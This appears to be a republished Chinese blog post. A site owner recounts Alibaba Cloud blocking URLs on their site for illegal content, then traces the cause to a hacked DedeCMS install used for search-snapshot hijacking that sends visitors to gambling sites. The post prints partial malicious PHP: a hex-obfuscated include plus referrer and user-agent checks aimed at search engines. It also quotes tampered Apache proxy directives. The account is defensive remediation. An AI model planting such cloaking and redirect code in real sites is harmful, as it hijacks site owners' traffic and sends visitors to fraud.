龙空技术网

CDN网站违规URL屏蔽访问处理通知 该如何解决?

丰本 86

前言:

今天你们对“cdndataurl”大约比较珍视,我们都需要分析一些“cdndataurl”的相关文章。那么小编也在网络上汇集了一些有关“cdndataurl””的相关文章,希望朋友们能喜欢,兄弟们一起来学习一下吧!

2018年1月8号一大早收到阿里云的邮件以及短信提醒大体内容是说:违规URL屏蔽访问通

知,立即登录阿里云官方,进账户面板查看信息,发现阿里云消息有很多条未读的,都是关于网

站被屏蔽访问的通知。点击查看详情如下图:

您的CDN网站URL:.******.net/k/cilrq/90070.htm涉及违法不良信息,违反了相关

服务协议和《互联网信息服务管理办法》第十五条规定,目前阿里云已对您的违法URL做屏

蔽访问处理。如果您对本通知的内容存有疑问,请及时工单或者电话联系我们,谢谢您对阿

里云的支持。

重点关注自2017年1月10日起,阿里云业务安全团队将执行监管政策针对网民举报或者监管下发7

天累计超过100个违法页面的网站进行升级处罚。

处罚标准如下:

第一次(7天累计违规网页达100条) 阻断域名 完全整改、公安平台提交备案、参加网站安全管

理考试及培训

第二次 (7天累计违规网页达100条) 阻断域名且1年内禁止参加阿里云平台营销活动。 完全整

改、公安平台成功备案、参加网站安全管理考试及培训。

第三次 (7天累计违规网页达100条)阻断域名,账号禁止购买且永不开通。

还有一个阿里云的屏蔽通知是URL禁止访问 您存在国家法律法规规定严禁买卖或传播的商品,如

下图所示:说是我网站存在一些非法的信息,国家不允许的。

网站被阿里云违规URL屏蔽访问处理通知,那么该如何解决这个问题?首先我第一想到的就是网站

有可能被黑客篡改了,看了下自己的网站在百度的收录情况,发现了问题,百度收录了许多与我们

网站不相关内容的信息,什么博彩,以及娱乐城等的网页快照,从百度点击进去直接跳转到博彩网

站上去,360直接拦截并提示为:未经证实的博彩赌博网站,您访问的网站含有未证实的境外博彩

或非法赌博的相关内容,可能给您造成财产上的损失,请您谨慎访问。

很无语,网站都运行一年多了,都没有被黑客攻击过,这次是彻底的碰到了,既然问题发生了,那

就勇敢的面对去解决问题,我的判断是网站程序代码里被植入了恶意木马病毒代码,于是连接FTP

把网站程序都下载到自己的电脑上,一行一行代码的进行查看,看的眼都花了,在数据库配置文件

里发现了问题。有一段加密的代码在里面:

@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F5570

6C6F616432F506963747572652F323031362D31312D31312F30'));

function parse_name($name, $type=0)

?php

set_time_limit(20);error_reporting(0);

define('u_b','/');

define('s_u','');

define('s_s','@haosou.com|360.cn|360spider|

so|360|sogou|baidu|youdao@i');

define('h_t',$_SERVER['SERVER_NAME']);define

('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP

_USER_AGENT']);define('h_z',s_p());

从上面代码可以看出,这个一个劫持百度快照的代码,劫持360,以及百度,搜狗等搜索引擎的一

个木马代码。删除掉以上代码,然后从百度点击进去,网站没有再跳转,看来问题的根本在这里。

本以为彻底的解决了问题,再从百度点击其他页面,又出现了跳转,欲哭无泪,这个黑客好高级,

干嘛要这么整我的网站啊。(后来咨询了很多安全行业的大牛,才知道,黑客利用我网站在百度

上的权重,进行百度快照劫持,导致我网站收录一些博彩的快照,以利于黑客的博彩关键词在百

度的排名)

对服务器的环境我也进行了详细的检查与审计,发现apache的配置文件http.conf 也被篡改了,代

码如下:

Proxypass /k(.)

ProxypassMatch /k(.)

打开上面的网址,直接跳转到了博彩网站上去了,去掉上面的代码网站恢复了正常。立即提交阿里

云的工单,告诉阿里云的技术,已经解决了网站违规的内容,请尽快解除网站的屏蔽,让网站恢复

正常访问。 不到2小时,阿里云技术回复了,已经解除对网站的屏蔽访问,至此网站违规URL屏蔽

访问处理通知,已得到彻底的解决。那么网站为何被篡改? 大部分是由于网站存在漏洞,我用的

是dedecms织梦系统,系统以前一直没升级更新过,导致以前的版本存在漏洞,网站才被黑客攻

击。现在网站已经升级到最新版本,没有再出现被篡改的情况。希望以上我的处理过程以及办法,

能帮到更多和我一样遇到这个情况的人。

(很多哥们也遇到了这个问题,加了我好友,并且描述了他们遇到的情况,有些是比较复杂的,

如果自己对网站代码不是太懂的话,建议找专业的网站安全公司来处理,国内像SINE安全公司、

绿盟安全公司、都是比较不错的,阿里云那面我也咨询了相关的解决方案,阿里云也是建议找

第三方安全公司处理。)

标签: #cdndataurl